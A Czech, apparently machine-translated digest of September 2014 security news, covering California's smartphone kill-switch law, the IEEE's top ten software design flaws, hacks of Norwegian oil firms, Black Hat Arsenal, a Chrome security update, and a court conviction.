V pondělí Kalifornský guvernér Jerry Brown podepsal do práva účet (SB 962), který bude vyžadovat jakýkoli smartphone prodává ve stavu po 1. červenci 2015, aby zahrnovala software nebo hardware (nebo obojí) "kill switch", že "může způsobit nefunkčnost základní vlastnosti smartphonu neoprávněný uživatel ", tedy každého, kdo není oprávněným vlastníkem zařízení.

To kill switch bude muset být schopen odolat hard reset a mělo by zabránit komukoli, kdo není vlastníkem zařízení od reaktivace to tak, že smartphone nelze použít nebo prodat na černém trhu. "Podle úřadu státního návladního pro město a kraj San Francisca, v roce 2012, více než 50 procent všech loupeží v San Franciscu jednalo o krádež mobilního komunikačního zařízení, "je uvedeno v návrhu zákona, a obchodování s odcizenými smartphonů se stal výnosný byznys pro zločinecké gangy. si klade za cíl Tento návrh zákona na snížení počtu ukradených smartphonů a očekávání jsou vysoká, protože podobné blokovací mechanismy, které v minulosti snížily krádeže automobilů v USA. Také, protože Apple představil zabít přepínač pro iPhone Loni v září se počet loupeží a krádeží zařízení byla výrazně snížena . Microsoft a Google se již zavázala vybudovat v kill switch do další verze svých mobilních operačních systémů. Samsung představil ji v dubnu. Zatímco tento nový zákon je oslavován mnoho, jsou tací, kteří se obávají, že funkce může být zneužita vymáhání práva, hackery a dalšími zločinci. "Je to skvělé pro spotřebitele, ale zve spoustu neplechy , "říká Hanni Fakhoury, personál advokát Electronic Frontier Foundation, komentoval pro Wired. "Můžete si představit domácí situaci násilí nebo pronásledování kontext, kdy někdo zabije telefon [A] oběti a brání jim zavolat policii, nebo oznámení o zneužití. To nebude překvapení, když vidíte, že se používá tímto způsobem. " EFF uvedl svůj nesouhlas s navrhovaným zákonem v dopise v červnu, ve kterém potvrdil, že proti krádeži technická opatření pro chytré telefony v podobě již existuje bezpečnostní software, a že tato řešení "umožňují správné uživatel telefonu na dálku aktivovat" kill switch ", aby k tomu, aby byl telefon nepoužitelný." "Ale SB 962 není výslovně o tom, kdo může aktivovat takový vypínač. A ještě kriticky , toto řešení bude k dispozici pro ostatní využití, stejně, včetně škodlivých činitelů nebo vymáhání práva, "dodali. "Zatímco SB 962 přijímá požadavky veřejné služby zákoníku 7908 regulovat a omezit okolnosti, za kterých vláda a orgány činné v trestním úředníci můžete aktivovat" kill switch, "Faktem zůstává, že přítomnost takového mechanismu v každém telefonu ve výchozím nastavení ne k dispozici, ale pro existenci kill switch zákona. " Také historie prokázala, že každý objekt, který lze použít pro spotřebitele a vymáhání práva mohou být také použity hackery. To by mohlo vést k situacím, kdy se blokují zařízení osob, které považují za své protivníky - soukromé osoby, donucovacích orgánů, a dokonce i státních zaměstnanců - jen proto, aby se pomstil.


10 Mezi nejvýznamnější nedostatky návrhu bezpečnostní software
2.9.2014 Bezpečnost
IEEE Centrum pro bezpečný design, iniciativa kybernetické bezpečnosti se zaměřením na identifikaci software konstrukčních vad, vydala zprávu, na základě reálných údajů shromážděných a analyzovaných odborníky na předních světových technologických společností. V roce 2014, IEEE Computer Society, přední Sdružení pro výpočet odborníků, zahájila iniciativu kybernetické s cílem rozšířit její další účast v kybernetické bezpečnosti. V rámci této iniciativy, IEEE Centrum pro bezpečný design (CSD) byl tvořen, který přivítal odborníky z různorodé skupiny organizací diskutovat o bezpečnostní software, nedostatky návrhu, které oni zjištěných ve svých vlastních vnitřních hodnocení designu. Výsledkem byl seznam Deset nejvýznamnějších chyby zabezpečení softwaru designové a konstrukční techniky se jim vyhnout. Praktické rady sahá od podpory správné použití aplikované kryptografie na ověřování každého jednotlivého bitu dat. Správný bezpečnostní provedení je Achillovou patou bezpečnostního inženýrství po celá desetiletí, hlavně proto, že je obtížné a vyžaduje hluboké znalosti. Více než jen identifikaci implementační chyby, IEEE CSD přímo řeší dnešní velmi tíživé bezpečnostní problém -. Bezpečnostní konstrukce "Centrum pro bezpečnou designu bude hrát klíčovou roli v přeorientování bezpečnostní software na některé z nejnáročnějších otevřený design problémy v oblasti bezpečnosti," řekl Neil Daswani z bezpečnostního inženýrství týmu na Twitteru. "Tím, že se zaměřují na bezpečnostní konstrukci, a to nejen se zaměřením na realizaci chyb v kódu, CSD dělá i ty nejvyspělejší společnosti v prostoru velkou službu." "Chyby a nedostatky jsou dvě velmi odlišné typy bezpečnostních závad," řekl Gary McGraw , CTO v Cigital. "Jsme přesvědčeni, že byl docela trochu více zaměřit na společných chyb, než jich bylo na bezpečném návrhu a zamezení chyb, což je znepokojující, protože konstrukční chyby představují 50% všech bezpečnostních otázek softwaru. IEEE Centrum pro bezpečný design nám umožňuje příležitost změnit zaměření, jak získat reálná data a sdílet své výsledky s celým světem. " Následující seznam doporučení, se narodil pomoci vývojářům vyhnout špičkové bezpečnostní konstrukční nedostatky:

Vydělejte nebo dát, ale nikdy předpokládat, důvěru
Použijte ověřovací mechanismus, který nelze obejít ani manipulováno
Povolit po ověření
Přísně oddělené údaje a řídící instrukce a nikdy řídicí pokyny přijaté z nedůvěryhodných zdrojů
Definujte přístup, který zaručuje, že všechny údaje jsou výslovně potvrzeny
Použití šifrování správně
Citlivé údaje, a jak by měly být řešeny
Vždy zvážit uživatelé
Vědět, jak integrovat externí komponenty změní váš útoku
Být flexibilní při posuzování budoucích změn objektů a herců.


50 potvrzen, možná více norské ropné společnosti hacknut
2.9.2014 Incidenty
50 norské ropné a energetické společnosti byly hacknutý a 250 další byli varováni kontrolovat své sítě a systémy pro důkazy o porušení, místní zprávy .

Mezi pravděpodobných cílů je Statoil, Norsko je největší ropná společnost. Identita ostatních firem, které byla porušena nebyly zveřejněny. Mluvčí Statoil potvrdil, že byli upozorněni na možný hack útok Národního bezpečnostního úřadu, norské bezpečnostní agentury, která mimo jiné, je obviněn z jednání s bezpečnostní záležitosti týkající se informačních a komunikačních technologií, stejně jako běžící národní CERT (NorCERT). Národní bezpečnostní úřad byl varován o útocích "mezinárodní kontakty", a zřejmě má tušení, kdo by mohl být za útoky, ale jsou volby nesdílet své podezření veřejně v tomto okamžiku. I když je to stále neznámé, co útočníci hledali, je pravděpodobné, že šli po duševního vlastnictví, obchodních a zákaznických dat. Není to poprvé, co norské ropné společnosti byly zasaženy cyber útočníci. Na konci roku 2011, nejméně deset ropy, plynu a obrany společnosti se sídlem v Norsku byl hacknut pomocí cílených spearphishing e-mailů a útočníků utekl s průmyslovými výkresů, smluv, uživatelská jména, hesla a tak dále.


Synergie hackerů a nástrojů na Black Hat Arsenal
2.9.2014 Bezpečnost
Black Hat USA 2014 nedávno přivítal více než 9000 z nejvíce renomovaných odborníků v oblasti bezpečnosti -. od nejjasnější v akademickém pro výzkumníky světové úrovně a vedoucích ve veřejném a soukromém sektoru Stranou od všeho půvabu kabiny dodavatele rozdávat trička a velké prezentační místnosti plné Rockstar zasedání, byl Arsenal -. místo, kde vývojáři byli schopni prezentovat své bezpečnostní nástroje a růst jejich komunitu Arsenal je duchovním NJ Ouchn, známý bezpečnostní expert a tvůrce ToolsWatch . Jeho neutuchající vášeň pro použití volně dostupných nástrojů během Penetrační testování střetnutí se vyvinul v to, co je opravdu konference v rámci konference, a pro některé je hlavním důvodem pro příchod do Las Vegas.

Letošní Arsenal, který NJ podařilo s pomocí Rachid Harrando, generální ředitel NETpeas, hostil autory 54 nástrojů, pocházejících ze zemí celého světa. Aby to bylo ještě zajímavější, některé nástroje byly představeny v Arsenalu a účastníci měli možnost se okamžitě zapojit vývojáře. Tam bylo něco pro každého: od útoku VoIP, forenzní na mobilní hacking a dále. Všechny moderátory Mluvil jsem nic než chválu jak pro NJ a Arsenal. Dan Cornell, CTO v Denim Group, mi řekl, že je to něco, co se těší na každý rok, protože je to skvělý způsob, jak dostat svou práci před kritickým publikem bezpečnostních expertů.

"Vždycky jsem byl ohromen, jak dobře fungující událost je -. Oba s podporou NJ, jakož i organizátory konference Black Hat se mi líbí otázky nejvíce, protože nám dávají velkou okno do obou nových funkcí, musíme stavět a jak musíme komunikovat o ThreadFix současných možností je, "řekl Cornell. Gruzie Weidman, generální ředitel společnosti Bulb bezpečnost, věří její Smartphone Pentest rámec by se nedostal nevšiml vůbec, kdyby nebylo pro Arsenal. "Bezpečnostní open source nástrojů jsou páteří výzkumu v oblasti bezpečnosti v těchto dnech, takže s místem pro ně je skvělá služba, která účastníkům Black Hat, stejně jako spisovatelé nástrojů," řekla. Bahtiyar Bircan, bezpečnostní poradce a autor Kit Heybe Penetrační testování Automation , řekl, že interakce s bezpečnostními odborníky z praxe na Arsenal mu nové myšlenky a povzbuzuje všechny k účasti.

Arsenal je v podstatě živnou půdou pro spolupráci a nové nápady chybí firemních triky. Co se běžně děje po skončení konference je, že projekty začnou spolupracovat a integrovat navzájem, zvýšení jejich hodnoty exponenciálně, ultimatively zvýšit nejen hodnotu nástrojů, ale také zvedat profil developer. Slyšel jsem, že developer prezentaci letos nabídl práci na plný úvazek a přímo na místě. Příště jsi


Nový Chrome opravuje 50 bezpečnostních otázek, chyba lovec dostane $ 30k
2.9.2014 Zranitelnosti
Které zavedly 50 opravy zabezpečení , tým Google Chrome je vytlačena novou stabilní verzi oblíbeného prohlížeče.

Společnost nesdílí mnoho podrobností o chybách, protože je to první čekají na většinu uživatelů za účelem provádění oprav, ale bylo zjištěno, že získal 30.000 dolar na několika výzkumných pracovníků určených pouze lokihardt @ asrt pro zveřejňování "kombinace chyb v V8, IPC, synchronizace a rozšíření, které mohou vést ke vzdálenému spuštění kódu mimo sandbox. " Jiní vědci se uděluje od 4000 dolar a 500 dolarů za zabil vysokých a středních závažnosti chyby a bezpečnostní tým Chrome byl chválen pro nalezení široký . řada nedostatků prostřednictvím interních auditů, fuzzing a dalších iniciativ uživatelé Windows mají další dobrou zprávu: Windows 64bit Chrome je pryč "stable". "64-bit Chrome nabízí mnoho výhod pro rychlost, stabilitu a bezpečnost Naše měření ukázala, že nativní. 64-bitová verze Chrome se zlepšila rychlost na mnoho našich grafiky a mediálních měřítek, "sdílený softwarový inženýr Will Harris v blogu oznámil vydání. "Například VP9 kodek, který je používán v High Definition videa z YouTube ukazuje 15% zlepšení výkonu dekódování. Měření stability od lidí, rozhodli do naší Canary, Dev a Beta 64-bitové kanály potvrzují, že 64-bit rendering motory jsou téměř dvakrát tak stabilní jako 32-bitové motorů při manipulaci typický webový obsah. Konečně, na 64-bit, naše obrana do hloubky zabezpečení snižující závažnost rizika, jako je Partition Alloc jsou schopni mnohem efektivněji bránit proti zranitelnosti, které se spoléhají na kontrolu rozložení paměti objektů. " Uživatelé těší na použití 64-bit Chrome, musíte ručně stáhnout instalátor, a být si vědom, že v současné době neexistuje 32-bitová podpora NPAPI plugin.


Bývalý HHS kybernetická bezpečnost ředitel odsouzen za dětské porno
2.9.2014 Incidenty
Bývalý úřadující ředitel kybernetické bezpečnosti na amerického ministerstva zdravotnictví a sociálních služeb byl odsouzen federální porota v okrese Nebraska a zabývá se zneužívání dětí podniku, spiknutí za účelem propagovat a distribuovat dětskou pornografii, a přístup k počítači s úmyslem zobrazit dětskou pornografii v souvislosti s jeho členstvím ve stránkách dětské pornografie.

Timothy DeFoggi, 56, předtím Germantown, Maryland, je šestá samostatná být odsouzen jako součást probíhajícího vyšetřování zaměřeného na tři dětské pornografie webové stránky. tři stránky byly provedeny jediným správcem, který se od té doby byl odsouzen v okrese Nebraska o zapojení se do zneužívání dětí podniku v souvislosti s jeho správou lokalit. Podle důkazů předložených u soudu, DeFoggi registrován jako člen stránkách dne 2. března 2012 a udržoval jeho členství a činnost až do 08.12.2012, kdy Webová stránka byla pořízena podle FBI. Prostřednictvím internetových stránek, DeFoggi přístupné dětské pornografie, získával dětskou pornografii od ostatních členů, a vyměnili Soukromé zprávy s ostatními členy, kde projevili zájem o násilné znásilnění a vraždy dětí. DeFoggi dokonce navrhl setkání jednoho člena osobně plnit jejich vzájemné představy násilně znásilnění a vraždy dětí. Porota dosáhl svůj verdikt po čtyřdenním řízení před US náčelník okresní soudce Laurie Smith Camp. Trestání je naplánováno na 07.11.2014.